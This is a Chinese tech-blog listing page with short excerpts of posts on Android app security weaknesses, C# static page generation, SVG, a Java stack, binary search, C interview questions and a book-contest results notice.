  • 浅谈:APP有哪些常被黑客利用的安全漏洞 gg163 APP
    首先,说到APP的安全漏洞,身为程序猿的大家应该不陌生;如果抛开安卓自身开源的问题的话,其主要产生的原因就是开发过程中疏忽或者代码不严谨引起的。但这些责任也不能怪在程序猿头上,有时会因为BOSS时间催得紧等很多可观原因。由国内移动应用安全检测团队爱内测(ineice.com)的CTO给我们浅谈关于Android 系统的开源设计以及生态环境。 1. 应用反编译漏洞:APK 包非常容易被反编译成可读
  • C#根据网址生成静态页面 hvt Web.netC#asp.nethovertree
    HoverTree开源项目中HoverTreeWeb.HVTPanel的Index.aspx文件是后台管理的首页。包含生成留言板首页,以及显示用户名,退出等功能。根据网址生成页面的方法:   bool CreateHtmlFile(string url, string path) { //http://keleyi.com/a/bjae/3d10wfax.htm stri
  • SVG 教程 (一) 天梯梦 svg
    SVG 简介 SVG 是使用 XML 来描述二维图形和绘图程序的语言。 学习之前应具备的基础知识: 继续学习之前,你应该对以下内容有基本的了解: HTML XML 基础 如果希望首先学习这些内容,请在本站的首页选择相应的教程。 什么是SVG? SVG 指可伸缩矢量图形 (Scalable Vector Graphics) SVG 用来定义用于网络的基于矢量
  • 一个简单的java栈 luyulong java数据结构
    public class MyStack { private long[] arr; private int top; public MyStack() { arr = new long[10]; top = -1; } public MyStack(int maxsize) { arr = new long[maxsize]; top
  • 基础数据结构和算法八:Binary search sunwinner AlgorithmBinary search
    Binary search needs an ordered array so that it can use array indexing to dramatically reduce the number of compares required for each search, using the classic and venerable binary search algori
  • 12个C语言面试题,涉及指针、进程、运算、结构体、函数、内存,看看你能做出几个! 刘星宇 c面试
    12个C语言面试题,涉及指针、进程、运算、结构体、函数、内存,看看你能做出几个! 1.gets()函数 问:请找出下面代码里的问题: #include<stdio.h> int main(void) {     char buff[10];     memset(buff,0,sizeof(buff));
  • ITeye 7月技术图书有奖试读获奖名单公布 ITeye管理员 活动ITeye试读
    ITeye携手人民邮电出版社图灵教育共同举办的7月技术图书有奖试读活动已圆满结束,非常感谢广大用户对本次活动的关注与参与。 7月试读活动回顾: http://webmaster.iteye.com/blog/2092746 本次技术图书试读活动的优秀奖获奖名单及相应作品如下(优秀文章有很多,但名额有限,没获奖并不代表不优秀): 《Java性能优化权威指南》
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他